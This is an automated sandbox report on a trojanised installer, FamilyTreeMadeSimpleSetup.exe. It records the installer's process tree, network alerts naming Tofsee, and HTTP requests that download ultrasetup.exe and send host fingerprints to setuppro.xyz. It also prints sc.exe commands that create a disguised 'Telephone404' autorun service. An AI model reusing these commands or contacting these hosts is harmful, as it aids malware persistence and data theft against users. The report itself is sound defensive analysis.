Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Aug. 26, 2022, 5:17 p.m.	Aug. 26, 2022, 5:21 p.m.

Size	1.7MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`15d662c8c08546225a2cc7aa985e6b99`
SHA256	`6aad3b97852a0606d9dc55ad9ea9d7875e10c92446279cbf8634927046d9cce7`
CRC32	`BCC3A901`
ssdeep	`24576:t4nXubIQGyxbPV0db26WOOqKGa4ZMsv1Et9uGpckT52zedlq89Ws5uIzk5aM/pho:tqe3f66gpSffPMWrQ0Zk+`
Yara	IsPE32 - (no description) OS_Processor_Check_Zero - OS Processor Check UPX_Zero - UPX packed file PE_Header_Zero - PE File Signature Malicious_Library_Zero - Malicious_Library

FamilyTreeMadeSimpleSetup.exe "C:\Users\test22\AppData\Local\Temp\FamilyTreeMadeSimpleSetup.exe"
2316
- FamilyTreeMadeSimpleSetup.tmp "C:\Users\test22\AppData\Local\Temp\is-0IEQD.tmp\FamilyTreeMadeSimpleSetup.tmp" /SL5="$3002C,921146,831488,C:\Users\test22\AppData\Local\Temp\FamilyTreeMadeSimpleSetup.exe"
  2392
  - installersetup1.exe "C:\Users\test22\AppData\Local\installersetup1.exe" /VERYSILENT /SUPPRESSMSGBOXES
    2724
    - installersetup1.tmp "C:\Users\test22\AppData\Local\Temp\is-53LRT.tmp\installersetup1.tmp" /SL5="$101FE,1092675,831488,C:\Users\test22\AppData\Local\installersetup1.exe" /VERYSILENT /SUPPRESSMSGBOXES
      2768
      - sc.exe "C:\Windows\system32\sc.exe" create Telephone404 start= auto DisplayName= "Telephone404" binPath= "C:\Windows\test22-pc\Runtimebroker8.exe"
        2876
      - sc.exe "C:\Windows\system32\sc.exe" description Telephone404 "Provides Telephony API (TAPI) support for programs that control telephony devices on the local computer and, through the LAN, on servers that are also running the service."
        2940
      - sc.exe "C:\Windows\system32\sc.exe" start Telephone404
        3008
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
installtracker.cfd	A 162.0.229.248	162.0.229.248
setuppro.xyz	A 74.208.236.195	74.208.236.195

IP Address	Status	Action
162.0.229.248	Active	Moloch
164.124.101.2	Active	Moloch
74.208.236.195	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49166 -> 162.0.229.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49164 -> 74.208.236.195:80	2022896	ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016	A Network Trojan was detected
TCP 192.168.56.103:49167 -> 162.0.229.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49164 -> 74.208.236.195:80	2022896	ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016	A Network Trojan was detected
TCP 74.208.236.195:80 -> 192.168.56.103:49164	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 162.0.229.248:443 -> 192.168.56.103:49183	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 162.0.229.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49180 -> 162.0.229.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49186 -> 162.0.229.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 162.0.229.248:443 -> 192.168.56.103:49175	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49181 -> 162.0.229.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49185 -> 162.0.229.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 162.0.229.248:443 -> 192.168.56.103:49187	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 162.0.229.248:443 -> 192.168.56.103:49168	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49172 -> 162.0.229.248:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

No Suricata TLS

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 26, 2022, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2022, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2022, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2022, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2022, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2022, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2022, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2022, 5:18 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 26, 2022, 5:17 p.m.			0	0
IsDebuggerPresent Aug. 26, 2022, 5:18 p.m.			0	0

Command line console output was observed (3 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 26, 2022, 5:18 p.m.	buffer: [SC] CreateService SUCCESS console_handle: 0x00000007	1	1
WriteConsoleW Aug. 26, 2022, 5:18 p.m.	buffer: [SC] ChangeServiceConfig2 SUCCESS console_handle: 0x00000007	1	1
WriteConsoleW Aug. 26, 2022, 5:18 p.m.	buffer: SERVICE_NAME: Telephone404 TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x1 WAIT_HINT : 0x0 PID : 3068 FLAGS : console_handle: 0x00000007	1	1

The executable contains unknown PE section names indicative of a packer (could be a false positive) (2 events)

section	.itext
section	.didata

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Aug. 26, 2022, 5:18 p.m.	stacktrace: TMethodImplementationIntercept+0x1fe108 dbkFCallWrapperAddr-0x1e6d8 familytreemadesimplesetup+0x2b3f68 @ 0x6b3f68 TMethodImplementationIntercept+0x1fe7ba dbkFCallWrapperAddr-0x1e026 familytreemadesimplesetup+0x2b461a @ 0x6b461a TMethodImplementationIntercept+0x1fecbc dbkFCallWrapperAddr-0x1db24 familytreemadesimplesetup+0x2b4b1c @ 0x6b4b1c TMethodImplementationIntercept+0x16cdef dbkFCallWrapperAddr-0xaf9f1 familytreemadesimplesetup+0x222c4f @ 0x622c4f TMethodImplementationIntercept+0x5e259 dbkFCallWrapperAddr-0x1be587 familytreemadesimplesetup+0x1140b9 @ 0x5140b9 TMethodImplementationIntercept+0x62704 dbkFCallWrapperAddr-0x1ba0dc familytreemadesimplesetup+0x118564 @ 0x518564 TMethodImplementationIntercept+0x7fd75 dbkFCallWrapperAddr-0x19ca6b familytreemadesimplesetup+0x135bd5 @ 0x535bd5 TMethodImplementationIntercept+0x62868 dbkFCallWrapperAddr-0x1b9f78 familytreemadesimplesetup+0x1186c8 @ 0x5186c8 TMethodImplementationIntercept+0x62704 dbkFCallWrapperAddr-0x1ba0dc familytreemadesimplesetup+0x118564 @ 0x518564 TMethodImplementationIntercept+0xf9436 dbkFCallWrapperAddr-0x1233aa familytreemadesimplesetup+0x1af296 @ 0x5af296 TMethodImplementationIntercept+0x11add4 dbkFCallWrapperAddr-0x101a0c familytreemadesimplesetup+0x1d0c34 @ 0x5d0c34 __dbk_fcall_wrapper+0x679ce TMethodImplementationIntercept-0x3da16 familytreemadesimplesetup+0x7844a @ 0x47844a gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755962fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75596d3a GetWindow+0x3f0 SendMessageW-0x1b user32+0x1965e @ 0x7559965e SendMessageW+0x4c GetAncestor-0xc0 user32+0x196c5 @ 0x755996c5 GetEffectiveClientRect+0x3409 DPA_Merge-0xa5a comctl32+0xa4601 @ 0x741c4601 GetEffectiveClientRect+0x346b DPA_Merge-0x9f8 comctl32+0xa4663 @ 0x741c4663 GetEffectiveClientRect+0x32f5 DPA_Merge-0xb6e comctl32+0xa44ed @ 0x741c44ed gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755962fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75596d3a GetClientRect+0xc5 CallWindowProcW-0xb user32+0x20d27 @ 0x755a0d27 CallWindowProcW+0x1b SetRectEmpty-0x38 user32+0x20d4d @ 0x755a0d4d TMethodImplementationIntercept+0x62813 dbkFCallWrapperAddr-0x1b9fcd familytreemadesimplesetup+0x118673 @ 0x518673 TMethodImplementationIntercept+0x62704 dbkFCallWrapperAddr-0x1ba0dc familytreemadesimplesetup+0x118564 @ 0x518564 TMethodImplementationIntercept+0x7fd75 dbkFCallWrapperAddr-0x19ca6b familytreemadesimplesetup+0x135bd5 @ 0x535bd5 __dbk_fcall_wrapper+0x679ce TMethodImplementationIntercept-0x3da16 familytreemadesimplesetup+0x7844a @ 0x47844a gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755962fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75596d3a GetWindow+0x3f0 SendMessageW-0x1b user32+0x1965e @ 0x7559965e SendMessageW+0x4c GetAncestor-0xc0 user32+0x196c5 @ 0x755996c5 DestroyPropertySheetPage+0x69a DllGetVersion-0x1939 comctl32+0x44136 @ 0x74164136 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755962fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75596d3a GetClientRect+0xc5 CallWindowProcW-0xb user32+0x20d27 @ 0x755a0d27 CallWindowProcW+0x1b SetRectEmpty-0x38 user32+0x20d4d @ 0x755a0d4d TMethodImplementationIntercept+0x62813 dbkFCallWrapperAddr-0x1b9fcd familytreemadesimplesetup+0x118673 @ 0x518673 TMethodImplementationIntercept+0x62704 dbkFCallWrapperAddr-0x1ba0dc familytreemadesimplesetup+0x118564 @ 0x518564 TMethodImplementationIntercept+0x7fd75 dbkFCallWrapperAddr-0x19ca6b familytreemadesimplesetup+0x135bd5 @ 0x535bd5 __dbk_fcall_wrapper+0x679ce TMethodImplementationIntercept-0x3da16 familytreemadesimplesetup+0x7844a @ 0x47844a gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755962fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75596d3a GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x75596de8 GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x75596e44 KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x772c011a PeekMessageW+0x197 MsgWaitForMultipleObjectsEx-0x143 user32+0x20751 @ 0x755a0751 TMethodImplementationIntercept+0x1027a9 dbkFCallWrapperAddr-0x11a037 familytreemadesimplesetup+0x1b8609 @ 0x5b8609 TMethodImplementationIntercept+0x20e9b3 dbkFCallWrapperAddr-0xde2d familytreemadesimplesetup+0x2c4813 @ 0x6c4813 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xeedfade exception.offset: 46887 exception.address: 0x766fb727 registers.esp: 1633752 registers.edi: 1634724 registers.eax: 1633752 registers.ebp: 1633832 registers.edx: 0 registers.ebx: 0 registers.esi: 14259488 registers.ecx: 7	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Aug. 26, 2022, 5:18 p.m.

stacktrace:

TMethodImplementationIntercept+0x1fe108 dbkFCallWrapperAddr-0x1e6d8 familytreemadesimplesetup+0x2b3f68 @ 0x6b3f68
TMethodImplementationIntercept+0x1fe7ba dbkFCallWrapperAddr-0x1e026 familytreemadesimplesetup+0x2b461a @ 0x6b461a
TMethodImplementationIntercept+0x1fecbc dbkFCallWrapperAddr-0x1db24 familytreemadesimplesetup+0x2b4b1c @ 0x6b4b1c
TMethodImplementationIntercept+0x16cdef dbkFCallWrapperAddr-0xaf9f1 familytreemadesimplesetup+0x222c4f @ 0x622c4f
TMethodImplementationIntercept+0x5e259 dbkFCallWrapperAddr-0x1be587 familytreemadesimplesetup+0x1140b9 @ 0x5140b9
TMethodImplementationIntercept+0x62704 dbkFCallWrapperAddr-0x1ba0dc familytreemadesimplesetup+0x118564 @ 0x518564
TMethodImplementationIntercept+0x7fd75 dbkFCallWrapperAddr-0x19ca6b familytreemadesimplesetup+0x135bd5 @ 0x535bd5
TMethodImplementationIntercept+0x62868 dbkFCallWrapperAddr-0x1b9f78 familytreemadesimplesetup+0x1186c8 @ 0x5186c8
TMethodImplementationIntercept+0x62704 dbkFCallWrapperAddr-0x1ba0dc familytreemadesimplesetup+0x118564 @ 0x518564
TMethodImplementationIntercept+0xf9436 dbkFCallWrapperAddr-0x1233aa familytreemadesimplesetup+0x1af296 @ 0x5af296
TMethodImplementationIntercept+0x11add4 dbkFCallWrapperAddr-0x101a0c familytreemadesimplesetup+0x1d0c34 @ 0x5d0c34
__dbk_fcall_wrapper+0x679ce TMethodImplementationIntercept-0x3da16 familytreemadesimplesetup+0x7844a @ 0x47844a
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755962fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75596d3a
GetWindow+0x3f0 SendMessageW-0x1b user32+0x1965e @ 0x7559965e
SendMessageW+0x4c GetAncestor-0xc0 user32+0x196c5 @ 0x755996c5
GetEffectiveClientRect+0x3409 DPA_Merge-0xa5a comctl32+0xa4601 @ 0x741c4601
GetEffectiveClientRect+0x346b DPA_Merge-0x9f8 comctl32+0xa4663 @ 0x741c4663
GetEffectiveClientRect+0x32f5 DPA_Merge-0xb6e comctl32+0xa44ed @ 0x741c44ed
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755962fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75596d3a
GetClientRect+0xc5 CallWindowProcW-0xb user32+0x20d27 @ 0x755a0d27
CallWindowProcW+0x1b SetRectEmpty-0x38 user32+0x20d4d @ 0x755a0d4d
TMethodImplementationIntercept+0x62813 dbkFCallWrapperAddr-0x1b9fcd familytreemadesimplesetup+0x118673 @ 0x518673
TMethodImplementationIntercept+0x62704 dbkFCallWrapperAddr-0x1ba0dc familytreemadesimplesetup+0x118564 @ 0x518564
TMethodImplementationIntercept+0x7fd75 dbkFCallWrapperAddr-0x19ca6b familytreemadesimplesetup+0x135bd5 @ 0x535bd5
__dbk_fcall_wrapper+0x679ce TMethodImplementationIntercept-0x3da16 familytreemadesimplesetup+0x7844a @ 0x47844a
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755962fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75596d3a
GetWindow+0x3f0 SendMessageW-0x1b user32+0x1965e @ 0x7559965e
SendMessageW+0x4c GetAncestor-0xc0 user32+0x196c5 @ 0x755996c5
DestroyPropertySheetPage+0x69a DllGetVersion-0x1939 comctl32+0x44136 @ 0x74164136
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755962fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75596d3a
GetClientRect+0xc5 CallWindowProcW-0xb user32+0x20d27 @ 0x755a0d27
CallWindowProcW+0x1b SetRectEmpty-0x38 user32+0x20d4d @ 0x755a0d4d
TMethodImplementationIntercept+0x62813 dbkFCallWrapperAddr-0x1b9fcd familytreemadesimplesetup+0x118673 @ 0x518673
TMethodImplementationIntercept+0x62704 dbkFCallWrapperAddr-0x1ba0dc familytreemadesimplesetup+0x118564 @ 0x518564
TMethodImplementationIntercept+0x7fd75 dbkFCallWrapperAddr-0x19ca6b familytreemadesimplesetup+0x135bd5 @ 0x535bd5
__dbk_fcall_wrapper+0x679ce TMethodImplementationIntercept-0x3da16 familytreemadesimplesetup+0x7844a @ 0x47844a
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755962fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75596d3a
GetThreadDesktop+0x185 GetWindowLongW-0x216 user32+0x16de8 @ 0x75596de8
GetThreadDesktop+0x1e1 GetWindowLongW-0x1ba user32+0x16e44 @ 0x75596e44
KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x772c011a
PeekMessageW+0x197 MsgWaitForMultipleObjectsEx-0x143 user32+0x20751 @ 0x755a0751
TMethodImplementationIntercept+0x1027a9 dbkFCallWrapperAddr-0x11a037 familytreemadesimplesetup+0x1b8609 @ 0x5b8609
TMethodImplementationIntercept+0x20e9b3 dbkFCallWrapperAddr-0xde2d familytreemadesimplesetup+0x2c4813 @ 0x6c4813
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xeedfade
exception.offset: 46887
exception.address: 0x766fb727
registers.esp: 1633752
registers.edi: 1634724
registers.eax: 1633752
registers.ebp: 1633832
registers.edx: 0
registers.ebx: 0
registers.esi: 14259488
registers.ecx: 7

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header				suspicious_request	GET http://setuppro.xyz/guid.php
suspicious_features	GET method with no useragent header				suspicious_request	GET http://setuppro.xyz/express.php?uid=2C43E82A198d1d2

Performs some HTTP requests (6 events)

request	HEAD http://setuppro.xyz/setup/ultrasetup.exe
request	GET http://setuppro.xyz/setup/ultrasetup.exe
request	GET http://setuppro.xyz/iam/ins.php?SMAC=&User=test22<o>PC<q>test22&UUID=2C43E82A-4640-204B-882F-B25EE182DD03&Vendor=innotekGmbH&Name=VirtualBox&HDDSerialNumber=VB67b7ddd6-f198d1d2&Caption=MicrosoftWindows7ProfessionalN&OSArchitectures=64-bit&OSerialNumber=87241-140-7508860-80129&ProcessorName=Intel(R)Core(TM)i5-8400CPU@2.80GHz&RAM=5368242176&version=1.52&publisherid=installer
request	GET http://setuppro.xyz/iam/i.php?mid=2C43E82A198d1d2&mac=&publisherid=installer&company=youk&pubid=0&advid=0
request	GET http://setuppro.xyz/guid.php
request	GET http://setuppro.xyz/express.php?uid=2C43E82A198d1d2

Allocates read-write-execute memory (usually to unpack itself) (11 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Aug. 26, 2022, 5:17 p.m.	process_identifier: 2316 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 26, 2022, 5:17 p.m.	process_identifier: 2316 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 745472 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 26, 2022, 5:17 p.m.	process_identifier: 2316 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004c4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 26, 2022, 5:17 p.m.	process_identifier: 2316 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 73728 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004c6000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2022, 5:17 p.m.	process_identifier: 2392 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00db0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2022, 5:19 p.m.	process_identifier: 1236 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000044b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 26, 2022, 5:18 p.m.	process_identifier: 2724 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 26, 2022, 5:18 p.m.	process_identifier: 2724 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 745472 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 26, 2022, 5:18 p.m.	process_identifier: 2724 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004c4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 26, 2022, 5:18 p.m.	process_identifier: 2724 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 73728 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004c6000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2022, 5:18 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00750000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW Aug. 26, 2022, 5:19 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 6852362240 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer total_number_of_bytes: 0	1	1	0

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\installersetup1.exe
file	C:\Users\test22\AppData\Local\Temp\is-KB2LQ.tmp\idp.dll

Creates a service (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateServiceW Aug. 26, 2022, 5:18 p.m.	service_start_name: start_type: 2 password: display_name: Telephone404 filepath: C:\Windows\test22-pc\Runtimebroker8.exe service_name: Telephone404 filepath_r: C:\Windows\test22-pc\Runtimebroker8.exe desired_access: 983551 service_handle: 0x0040b830 error_control: 1 service_type: 16 service_manager_handle: 0x0040b8d0	1	4241456	0

Drops an executable to the user AppData folder (4 events)

file	C:\Users\test22\AppData\Local\Temp\is-0IEQD.tmp\FamilyTreeMadeSimpleSetup.tmp
file	C:\Users\test22\AppData\Local\Temp\is-53LRT.tmp\installersetup1.tmp
file	C:\Users\test22\AppData\Local\installersetup1.exe
file	C:\Users\test22\AppData\Local\Temp\is-KB2LQ.tmp\idp.dll

An executable file was downloaded by the process familytreemadesimplesetup.tmp (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Aug. 26, 2022, 5:17 p.m.	buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL '¸`àP\ì^p@ @@@ 6p`ä"D0¤.text68 `.itextP< `.data¤7p8T@À.bssèm°À.idata6 @À.didata¤0@À.edata@@@.tlsPÀ.rdata]` @@.rsrcp¢@@ °@@ request_handle: 0x00cc000c	1	1	0

Queries for potentially installed applications (5 events)

Time & API	Arguments	Status	Return
RegOpenKeyExW Aug. 26, 2022, 5:17 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{850F8E51-F6AD-42D7-86D7-86F200097D7E}}_is1 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{850F8E51-F6AD-42D7-86D7-86F200097D7E}}_is1		2
RegOpenKeyExW Aug. 26, 2022, 5:18 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{81E839A2-1122-49DE-A760-73201945A065} base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{81E839A2-1122-49DE-A760-73201945A065}		2
RegOpenKeyExW Aug. 26, 2022, 5:18 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{81E839A2-1122-49DE-A760-73201945A065} base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{81E839A2-1122-49DE-A760-73201945A065}		2
RegOpenKeyExW Aug. 26, 2022, 5:18 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{81E839A2-1122-49DE-A760-73201945A065}}_is1 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{81E839A2-1122-49DE-A760-73201945A065}}_is1		2
RegOpenKeyExW Aug. 26, 2022, 5:18 p.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{81E839A2-1122-49DE-A760-73201945A065} base_handle: 0x80000002 key_handle: 0x00000358 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{81E839A2-1122-49DE-A760-73201945A065}	1	0

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	"C:\Windows\system32\sc.exe" start Telephone404
cmdline	"C:\Windows\system32\sc.exe" description Telephone404 "Provides Telephony API (TAPI) support for programs that control telephony devices on the local computer and, through the LAN, on servers that are also running the service."
cmdline	"C:\Windows\system32\sc.exe" create Telephone404 start= auto DisplayName= "Telephone404" binPath= "C:\Windows\test22-pc\Runtimebroker8.exe"

Installs itself for autorun at Windows startup (1 event)

service_name

Telephone404

service_path

C:\Windows\test22-pc\Runtimebroker8.exe

Attempts to modify browser security settings (24 events)

registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0018.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_002.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Support_Chat_001.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0015.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Support Chat.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_003.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0012.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_008.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_009.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_004.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0011.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_005.exe
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0010.exe
